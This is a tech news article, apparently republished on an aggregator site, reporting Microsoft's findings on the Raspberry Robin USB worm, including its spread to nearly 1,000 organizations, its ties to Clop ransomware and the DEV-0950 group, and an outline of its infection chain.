Dejkala
No Result
View All Result
  • Home
  • Tech
  • Banking & loan
  • Games
  • Car’s & Bike’s
  • Home
  • Tech
  • Banking & loan
  • Games
  • Car’s & Bike’s
No Result
View All Result
Dejkala
No Result
View All Result
Home Latest update

Microsoft: Raspberry Robin USB worm hits nearly 1,000 organizations in the past month- Dejkala

by hasibul
October 28, 2022
in Latest update
0
Microsoft: Raspberry Robin USB worm hits nearly 1,000 organizations in the past month- Dejkala
0
VIEWS
Share on FacebookShare on Twitter


USB malware

Image: M-A-U / Getty Images

Microsoft is warning that the relatively new Raspberry Robin USB drive worm has triggered payload alerts on nearly 3,000 devices in almost 1,000 organizations in the past 30 days. 

Raspberry Robin malware has previously been seen installed with FakeUpdates malware, which has been linked to the Russian cyber-crime group EvilCorp. Raspberry Robin has also been used to deploy Lockbit ransomware, as well as IcedID, Bumblebee, and Truebot malware. Now, Microsoft has seen it being used to deploy Clop ransomware.

Microsoft attributes Clop deployments connected with the use of Raspberry Robin to a group it tracks as DEV-0950. Its activities overlap with the advanced hacking groups tracked by FireEye as FIN11. The group last year published its victims’ data on the Clop ransomware leak site.

“DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages,” notes the Microsoft Security Threat Intelligence Center (MSTIC).

Also: Ransomware: Why it’s still a big threat, and where the gangs are going next

Security firm Red Canary discovered the Raspberry Robin worm in September 2021 and said it was often installed on Windows systems via a USB drive, which contains a LNK shortcut file disguised as a folder. The malware relies on victims inserting a USB drive to run. While autorun of removable media is disabled by default on Windows, Microsoft notes that many organizations enable it through legacy Group Policy changes. 

MSTIC has found that Raspberry Robin relies on both autorun and tricking users into clicking the LINK file. 

“Some Raspberry Robin drives only have the LNK and executable files, while drives from earlier infections have a configured autorun.inf,” MSTIC notes.  

This change could explain why the names of the shortcut files changed from more generic names like recovery.lnk to brand names of USB drives. Microsoft suspects this is to encourage a user to execute the LNK file. It also calls on compromised QNAP storage appliances to deliver a malicious payload.    

“Raspberry Robin’s LNK file points to cmd.exe to launch the Windows Installer service msiexec.exe and install a malicious payload hosted on compromised QNAP network attached storage (NAS) devices,” MSTIC explains. 

As of July, FakeUpdates, a JavaScript backdoor, tapped Raspberry Robin for delivery, adding to malicious ads that were previously used for delivery. 

Also: What, exactly, is cybersecurity? And why does it matter?

Microsoft has found some connections between Raspberry Robin and another piece of malware called Fauppod, which also communicates compromised QNAP appliances. Fauppod is a heavily obfuscated piece of malware written in .NET. Microsoft believes Fauppod is part of the initial method by which Raspberry Robin infects machines.

“Based on our investigation, Microsoft currently assesses with medium confidence that the above .NET DLLs delivered both by Raspberry Robin LNK infections and Fauppod CPL samples are responsible for spreading Raspberry Robin LNK files to USB drives. These LNK files, in turn, infect other hosts via the infection chain detailed in Red Canary’s blog.”

“Microsoft also assesses with medium confidence that the Fauppod-packed CPL samples are currently the earliest known point in the attack chain for propagating Raspberry Robin infections to targets. Microsoft findings suggest that the Fauppod CPL entities, the obfuscated .NET LNK spreader modules they drop, the Raspberry Robin LNK files Red Canary documented, and the Raspberry Robin DLL files (or, Roshtyak, as per Avast) could all be considered as various components to the “Raspberry Robin” malware infection chain.”

Microsoft also backed up IBM’s previous assertion that Fauppod was linked to the notorious Dridex banking trojan.


Related

ShareTweetShare

Related Posts

Kaspersky: some versions of Pinduoduo, suspended by Google from its app store, exploited Android vulnerabilities to install backdoors and gain user data access (Sarah Zheng/Bloomberg)- Dejkala
Latest update

Kaspersky: some versions of Pinduoduo, suspended by Google from its app store, exploited Android vulnerabilities to install backdoors and gain user data access (Sarah Zheng/Bloomberg)- Dejkala

March 27, 2023
Amazon will give you a $50 gift card when you buy a year of Microsoft 365 Family- Dejkala
Latest update

Amazon will give you a $50 gift card when you buy a year of Microsoft 365 Family- Dejkala

March 27, 2023
Nvidia CTO Michael Kagan says crypto does not "bring anything useful for society" and other processing power uses like AI are more worthwhile than crypto mining (Alex Hern/The Guardian)- Dejkala
Latest update

Nvidia CTO Michael Kagan says crypto does not "bring anything useful for society" and other processing power uses like AI are more worthwhile than crypto mining (Alex Hern/The Guardian)- Dejkala

March 27, 2023
The French government bans TikTok and all other recreational apps from staff phones, claiming none have sufficiently robust security for government devices (Simon Sharwood/The Register)- Dejkala
Latest update

The French government bans TikTok and all other recreational apps from staff phones, claiming none have sufficiently robust security for government devices (Simon Sharwood/The Register)- Dejkala

March 27, 2023
Alex Szapiro, co-head of SoftBank's nearly $8B Latin America fund, says he is confident about securing extra capital from its parent despite a ~$900M paper loss (Michael Pooler/Financial Times)- Dejkala
Latest update

Alex Szapiro, co-head of SoftBank's nearly $8B Latin America fund, says he is confident about securing extra capital from its parent despite a ~$900M paper loss (Michael Pooler/Financial Times)- Dejkala

March 27, 2023
Avoid roaming charges with this specialized eSIM- Dejkala
Latest update

Avoid roaming charges with this specialized eSIM- Dejkala

March 27, 2023
Next Post
Despite climate pledges by US tech giants, Greenpeace finds key supplies for Amazon, Microsoft, Google, HP, and others remain deeply reliant on fossil fuels (Bloomberg)- Dejkala

Despite climate pledges by US tech giants, Greenpeace finds key supplies for Amazon, Microsoft, Google, HP, and others remain deeply reliant on fossil fuels (Bloomberg)- Dejkala

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Categories

  • Earn Money Online
  • Game news and review
  • Laptops
  • Latest update
  • Smartphone Reviews & News
  • TODAY Tech News
  • Upcoming Technology
  • Wordpress plugin
  • WordPress themes
  • World Wide Bike Reviews and News
  • World Wide Car News

Recommended

Scale AI, which helps companies label data for ML algorithms and was valued at $7.3B in Apr. 2021, lays off 20% of its staff; it had ~450 employees in Feb. 2022 (Kirsten Korosec/TechCrunch)- Dejkala

Scale AI, which helps companies label data for ML algorithms and was valued at $7.3B in Apr. 2021, lays off 20% of its staff; it had ~450 employees in Feb. 2022 (Kirsten Korosec/TechCrunch)- Dejkala

January 10, 2023
Apple has changed its high-end Mac Pro hardware plans, says report- Dejkala

Apple has changed its high-end Mac Pro hardware plans, says report- Dejkala

December 20, 2022
Apple just released updates for the iPhone, iPad, and Mac, with bug fixes and security improvements- Dejkala

Apple just released updates for the iPhone, iPad, and Mac, with bug fixes and security improvements- Dejkala

February 13, 2023
Tesla’s Wireless Charging Platform is well-made and exorbitant- Dejkala

Tesla’s Wireless Charging Platform is well-made and exorbitant- Dejkala

March 22, 2023
Unvaccinated more likely to have heart attack, stroke after COVID, study finds- Dejkala

Unvaccinated more likely to have heart attack, stroke after COVID, study finds- Dejkala

February 21, 2023
Watch Nintendo’s Indie World stream here at 12PM ET- Dejkala

Watch Nintendo’s Indie World stream here at 12PM ET- Dejkala

November 9, 2022
Kaspersky: some versions of Pinduoduo, suspended by Google from its app store, exploited Android vulnerabilities to install backdoors and gain user data access (Sarah Zheng/Bloomberg)- Dejkala

Kaspersky: some versions of Pinduoduo, suspended by Google from its app store, exploited Android vulnerabilities to install backdoors and gain user data access (Sarah Zheng/Bloomberg)- Dejkala

March 27, 2023
Amazon will give you a $50 gift card when you buy a year of Microsoft 365 Family- Dejkala

Amazon will give you a $50 gift card when you buy a year of Microsoft 365 Family- Dejkala

March 27, 2023
Nvidia CTO Michael Kagan says crypto does not "bring anything useful for society" and other processing power uses like AI are more worthwhile than crypto mining (Alex Hern/The Guardian)- Dejkala

Nvidia CTO Michael Kagan says crypto does not "bring anything useful for society" and other processing power uses like AI are more worthwhile than crypto mining (Alex Hern/The Guardian)- Dejkala

March 27, 2023

Categories

  • Earn Money Online
  • Game news and review
  • Laptops
  • Latest update
  • Smartphone Reviews & News
  • TODAY Tech News
  • Upcoming Technology
  • Wordpress plugin
  • WordPress themes
  • World Wide Bike Reviews and News
  • World Wide Car News

Pages

  • About Us
  • Banking & loan
  • Car’s & Bike’s
  • Contact Us
  • Games
  • Home
  • Home 2
  • Privacy Policy
  • Tech

© 2022 Dejkala

No Result
View All Result
  • Homepages
    • Home – Layout 1
    • Home – Layout 2

© 2022 Dejkala